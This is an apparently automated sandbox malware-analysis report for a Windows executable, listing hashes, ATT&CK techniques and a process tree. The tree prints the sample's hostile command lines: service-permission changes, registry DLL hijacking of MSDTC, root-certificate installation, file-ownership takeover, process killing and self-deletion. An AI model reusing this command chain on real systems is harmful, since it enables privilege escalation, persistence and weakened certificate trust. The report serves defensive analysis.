6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91

Analysis

max time kernel
151s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
15/05/2023, 02:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe
Size

1.8MB
MD5

f51cca4a125e255c56dc3985eed32afe
SHA1

cc3a3e408c0a1a834e1ae3618eeec83e16ae46e3
SHA256

6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91
SHA512

6edf2d043381ee79617d419bcc87bbc1287a3e37fb2f9bf08a82f4aced3acb36a6e8c981a3782713052175dfca530dec32664a449e0e1c6af289558ab7e026c6
SSDEEP

49152:fHcHwFlO+/v7tiSk7Yux/qd2tnCSnpWgfEbN:f8QlLn7tZk0Wyct3M8oN

Score

8^/10

discovery evasion exploit

Malware Config

Signatures

Possible privilege escalation attempt 6 IoCs

exploit

pid	Process
2984	icacls.exe
1436	takeown.exe
2104	icacls.exe
4256	takeown.exe
2784	takeown.exe
2312	icacls.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe

Executes dropped EXE 1 IoCs

pid	Process
2312	GetLastInput.exe

Loads dropped DLL 2 IoCs

pid	Process
4288	svchost.exe
1080	msdtc.exe

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2984	icacls.exe
1436	takeown.exe
2104	icacls.exe
2784	takeown.exe
4256	takeown.exe
2312	icacls.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Tasks\SA.DAT	svchost.exe
File opened for modification	C:\Windows\Tasks\SA.DAT	svchost.exe
File created	C:\Windows\WptsExtensions.dll	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe
File opened for modification	C:\Windows\WptsExtensions.dll	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe
File opened for modification	C:\Windows\Tasks\SA.DAT	svchost.exe
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2184	sc.exe
3432	sc.exe
3860	sc.exe
2132	sc.exe
3896	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 5 IoCs

evasion

pid	Process
3648	taskkill.exe
4648	taskkill.exe
2720	taskkill.exe
4568	taskkill.exe
4632	taskkill.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2244	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4288	svchost.exe
4288	svchost.exe
2312	GetLastInput.exe
2312	GetLastInput.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe
4288	svchost.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeSecurityPrivilege	3896	sc.exe
Token: SeSecurityPrivilege	3896	sc.exe
Token: SeTakeOwnershipPrivilege	2784	takeown.exe
Token: SeTakeOwnershipPrivilege	4256	takeown.exe
Token: SeSecurityPrivilege	3432	sc.exe
Token: SeSecurityPrivilege	3432	sc.exe
Token: SeRestorePrivilege	2312	icacls.exe
Token: SeRestorePrivilege	2984	icacls.exe
Token: SeDebugPrivilege	3648	taskkill.exe
Token: SeAuditPrivilege	4144	svchost.exe
Token: SeDebugPrivilege	4648	taskkill.exe
Token: SeAuditPrivilege	2504	svchost.exe
Token: SeDebugPrivilege	2720	taskkill.exe
Token: SeDebugPrivilege	4568	taskkill.exe
Token: SeTakeOwnershipPrivilege	1436	takeown.exe
Token: SeRestorePrivilege	2104	icacls.exe
Token: SeAuditPrivilege	4288	svchost.exe
Token: SeSecurityPrivilege	2132	sc.exe
Token: SeSecurityPrivilege	2132	sc.exe
Token: SeLockMemoryPrivilege	1080	msdtc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1080	msdtc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3948 wrote to memory of 2796	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	85
PID 3948 wrote to memory of 2796	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	85
PID 2796 wrote to memory of 3896	2796	cmd.exe	87
PID 2796 wrote to memory of 3896	2796	cmd.exe	87
PID 2796 wrote to memory of 2184	2796	cmd.exe	88
PID 2796 wrote to memory of 2184	2796	cmd.exe	88
PID 2796 wrote to memory of 2784	2796	cmd.exe	89
PID 2796 wrote to memory of 2784	2796	cmd.exe	89
PID 2796 wrote to memory of 4256	2796	cmd.exe	90
PID 2796 wrote to memory of 4256	2796	cmd.exe	90
PID 3948 wrote to memory of 2172	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	91
PID 3948 wrote to memory of 2172	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	91
PID 2172 wrote to memory of 4008	2172	cmd.exe	93
PID 2172 wrote to memory of 4008	2172	cmd.exe	93
PID 3948 wrote to memory of 3232	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	94
PID 3948 wrote to memory of 3232	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	94
PID 3232 wrote to memory of 3032	3232	cmd.exe	96
PID 3232 wrote to memory of 3032	3232	cmd.exe	96
PID 3948 wrote to memory of 3704	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	97
PID 3948 wrote to memory of 3704	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	97
PID 3704 wrote to memory of 3432	3704	cmd.exe	99
PID 3704 wrote to memory of 3432	3704	cmd.exe	99
PID 3948 wrote to memory of 2292	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	100
PID 3948 wrote to memory of 2292	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	100
PID 2292 wrote to memory of 1504	2292	cmd.exe	102
PID 2292 wrote to memory of 1504	2292	cmd.exe	102
PID 3948 wrote to memory of 4840	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	103
PID 3948 wrote to memory of 4840	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	103
PID 3948 wrote to memory of 1556	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	105
PID 3948 wrote to memory of 1556	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	105
PID 1556 wrote to memory of 2312	1556	cmd.exe	107
PID 1556 wrote to memory of 2312	1556	cmd.exe	107
PID 1556 wrote to memory of 876	1556	cmd.exe	108
PID 1556 wrote to memory of 876	1556	cmd.exe	108
PID 1556 wrote to memory of 556	1556	cmd.exe	109
PID 1556 wrote to memory of 556	1556	cmd.exe	109
PID 1556 wrote to memory of 2984	1556	cmd.exe	110
PID 1556 wrote to memory of 2984	1556	cmd.exe	110
PID 1556 wrote to memory of 1364	1556	cmd.exe	111
PID 1556 wrote to memory of 1364	1556	cmd.exe	111
PID 1556 wrote to memory of 4824	1556	cmd.exe	112
PID 1556 wrote to memory of 4824	1556	cmd.exe	112
PID 3948 wrote to memory of 4052	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	113
PID 3948 wrote to memory of 4052	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	113
PID 4052 wrote to memory of 3648	4052	cmd.exe	115
PID 4052 wrote to memory of 3648	4052	cmd.exe	115
PID 3948 wrote to memory of 4948	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	117
PID 3948 wrote to memory of 4948	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	117
PID 4948 wrote to memory of 4648	4948	cmd.exe	119
PID 4948 wrote to memory of 4648	4948	cmd.exe	119
PID 3948 wrote to memory of 2128	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	121
PID 3948 wrote to memory of 2128	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	121
PID 2128 wrote to memory of 2720	2128	cmd.exe	123
PID 2128 wrote to memory of 2720	2128	cmd.exe	123
PID 3948 wrote to memory of 456	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	124
PID 3948 wrote to memory of 456	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	124
PID 456 wrote to memory of 4568	456	cmd.exe	126
PID 456 wrote to memory of 4568	456	cmd.exe	126
PID 3948 wrote to memory of 3556	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	127
PID 3948 wrote to memory of 3556	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	127
PID 3556 wrote to memory of 4632	3556	cmd.exe	129
PID 3556 wrote to memory of 4632	3556	cmd.exe	129
PID 3948 wrote to memory of 4624	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	132
PID 3948 wrote to memory of 4624	3948	6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe	132

C:\Users\Admin\AppData\Local\Temp\6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe
"C:\Users\Admin\AppData\Local\Temp\6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3948
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c sc.exe sdset msdtc "D:(A;;DCLCWPDTSDCC;;;IU)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" & sc stop msdtc & takeown /F C:\ProgramData\oci.txt & del C:\ProgramData\oci.txt & takeown /F C:\ProgramData\sRDI.dat & del C:\ProgramData\sRDI.dat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\system32\sc.exe
    sc.exe sdset msdtc "D:(A;;DCLCWPDTSDCC;;;IU)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
    3⤵
    - Launches sc.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:3896
- - C:\Windows\system32\sc.exe
    sc stop msdtc
    3⤵
    - Launches sc.exe
    PID:2184
- - C:\Windows\system32\takeown.exe
    takeown /F C:\ProgramData\oci.txt
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- - C:\Windows\system32\takeown.exe
    takeown /F C:\ProgramData\sRDI.dat
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4256
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI /v "OracleOciLib" /t REG_SZ /d "../../ProgramData/oci.txt" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2172
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI /v "OracleOciLib" /t REG_SZ /d "../../ProgramData/oci.txt" /f
    3⤵
    PID:4008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI /v "OracleOciLibPath" /t REG_EXPAND_SZ /d "%systemroot%\\system32" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3232
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI /v "OracleOciLibPath" /t REG_EXPAND_SZ /d "C:\Windows\\system32" /f
    3⤵
    PID:3032
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c sc.exe sdset msdtc "D:(D;;DCLCWPDTSDCC;;;IU)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3704
- - C:\Windows\system32\sc.exe
    sc.exe sdset msdtc "D:(D;;DCLCWPDTSDCC;;;IU)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
    3⤵
    - Launches sc.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:3432
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c certutil -f -addstore root C:\\ProgramData\Root.cer
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2292
- - C:\Windows\system32\certutil.exe
    certutil -f -addstore root C:\\ProgramData\Root.cer
    3⤵
    PID:1504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c del C:\ProgramData\Root.cer
  2⤵
  PID:4840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c icacls C:\\ProgramData\oci.txt /setowner "NT AUTHORITY\NETWORK SERVICE" & echo y|cacls C:\\ProgramData\oci.txt /S:D:PAI(A;;FA;;;NS) & icacls C:\\ProgramData\sRDI.dat /setowner "NT AUTHORITY\NETWORK SERVICE" & echo y|cacls C:\\ProgramData\sRDI.dat /S:D:PAI(A;;FA;;;NS)
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1556
- - C:\Windows\system32\icacls.exe
    icacls C:\\ProgramData\oci.txt /setowner "NT AUTHORITY\NETWORK SERVICE"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:876
- - C:\Windows\system32\cacls.exe
    cacls C:\\ProgramData\oci.txt /S:D:PAI(A;;FA;;;NS)
    3⤵
    PID:556
- - C:\Windows\system32\icacls.exe
    icacls C:\\ProgramData\sRDI.dat /setowner "NT AUTHORITY\NETWORK SERVICE"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1364
- - C:\Windows\system32\cacls.exe
    cacls C:\\ProgramData\sRDI.dat /S:D:PAI(A;;FA;;;NS)
    3⤵
    PID:4824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c taskkill /f /pid 1076
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid 1076
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c taskkill /f /pid 4144
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4948
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid 4144
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c taskkill /f /pid 2504
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid 2504
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2720
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c taskkill /f /pid 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid 0
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c taskkill /f /pid 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3556
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid 0
    3⤵
    - Kills process with taskkill
    PID:4632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c takeown /F C:\Windows\Wptsextensions.dll & echo y|cacls C:\Windows\Wptsextensions.dll /S:D:PAI(A;;0x1200a9;;;SY)(A;;FA;;;BA) & del C:\Windows\Wptsextensions.dll
  2⤵
  PID:4624
- - C:\Windows\system32\takeown.exe
    takeown /F C:\Windows\Wptsextensions.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:236
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\Wptsextensions.dll /S:D:PAI(A;;0x1200a9;;;SY)(A;;FA;;;BA)
    3⤵
    PID:324
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c icacls C:\\Windows\Wptsextensions.dll /setowner "NT AUTHORITY\SYSTEM" & echo y|cacls C:\\Windows\Wptsextensions.dll /S:D:PAI(A;;0x1200a9;;;SY) & sc start schedule
  2⤵
  PID:4952
- - C:\Windows\system32\icacls.exe
    icacls C:\\Windows\Wptsextensions.dll /setowner "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3032
- - C:\Windows\system32\cacls.exe
    cacls C:\\Windows\Wptsextensions.dll /S:D:PAI(A;;0x1200a9;;;SY)
    3⤵
    PID:1164
- - C:\Windows\system32\sc.exe
    sc start schedule
    3⤵
    - Launches sc.exe
    PID:3860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c ping 127.0.0.1 & del C:\Users\Admin\AppData\Local\Temp\6bfb036a4b70c51c187f9b92180b7054ac95b78c00dd55b0d798e3a1dfd76a91.exe
  2⤵
  PID:3540
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /c sc.exe sdset msdtc "D:(D;;DCLCWPDTSDCC;;;IU)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
  2⤵
  PID:5112
- - C:\Windows\system32\sc.exe
    sc.exe sdset msdtc "D:(D;;DCLCWPDTSDCC;;;IU)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
    3⤵
    - Launches sc.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:2132
- C:\ProgramData\GetLastInput.exe
  C:\ProgramData\GetLastInput.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2312

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1080

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GetLastInput.exe

Filesize
124KB

MD5
644326be80982df1d8b225e6734f99a3

SHA1
18ba8c8dfb5a893f48bacefce72f7a98ff14a571

SHA256
6b258032724aafdb11006b5317e9e7f55a8e2e1cc30298b1f63324e705a90aa3

SHA512
daca64153643f6edafad8cd341ef508efcccd31ca6c75beffb7d509021e92d98e1ff0dc885138e5e728249f520feb1113a2c0c5f6aa3d5860512e50b44a996bb

Download Submit
C:\ProgramData\GetLastInput.exe

Filesize
124KB

MD5
644326be80982df1d8b225e6734f99a3

SHA1
18ba8c8dfb5a893f48bacefce72f7a98ff14a571

SHA256
6b258032724aafdb11006b5317e9e7f55a8e2e1cc30298b1f63324e705a90aa3

SHA512
daca64153643f6edafad8cd341ef508efcccd31ca6c75beffb7d509021e92d98e1ff0dc885138e5e728249f520feb1113a2c0c5f6aa3d5860512e50b44a996bb

Download Submit
C:\ProgramData\Root.cer

Filesize
1KB

MD5
026026c16bad3efa4e542e717a74efa1

SHA1
995145ac46d90b0c606a15cce21d12c6f6f88cfd

SHA256
e840574e901d4a736d6054cdaa6f291c0bbcd2e4648f6fb7ed31a39451b04ed0

SHA512
0567dd994c77ebfde805014f34f5f65dd9096a9fa60fc9a4607220e1c9e1548417c62409118e1c66506861819cff8b84aa10d84da4f50f311c6b655da4555ae2

Download Submit
C:\ProgramData\oci.txt

Filesize
174KB

MD5
74db56c3952a2d76dcc367358ef311a7

SHA1
7ab77afa304d83d83fa0bff17e8e2b8404e517bf

SHA256
9ddb307ab200ae4039b961230e63829ef1236919d5f7545087d41c3bcb46b768

SHA512
e29cf0874ca3fc133519b380b04daf4d55c0bf2e5b92916e8986aa2eedd6fe0a55337e9d47e55a06d10219a515a979952424317bd9ca52dbefba97fdb06b03fc

Download Submit
C:\ProgramData\oci.txt

Filesize
174KB

MD5
74db56c3952a2d76dcc367358ef311a7

SHA1
7ab77afa304d83d83fa0bff17e8e2b8404e517bf

SHA256
9ddb307ab200ae4039b961230e63829ef1236919d5f7545087d41c3bcb46b768

SHA512
e29cf0874ca3fc133519b380b04daf4d55c0bf2e5b92916e8986aa2eedd6fe0a55337e9d47e55a06d10219a515a979952424317bd9ca52dbefba97fdb06b03fc

Download Submit
C:\ProgramData\sRDI.dat

Filesize
1.4MB

MD5
2a7022fb5c9ae36fa91083169e3b7f8e

SHA1
e985d59f0a6942f730e08abfa2f12e59ce9ae4a6

SHA256
fb69387ed8eeae019c10274d023ae134b762285ab71e0638a140e7c409adde45

SHA512
bdb80222d9469aa92f9058a156938b9bfd0e760a3912284b696b601d43ed78f55c7e910e9e777b629b69272503f67a8cdd336b109f3402ae45eda701d3977021

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
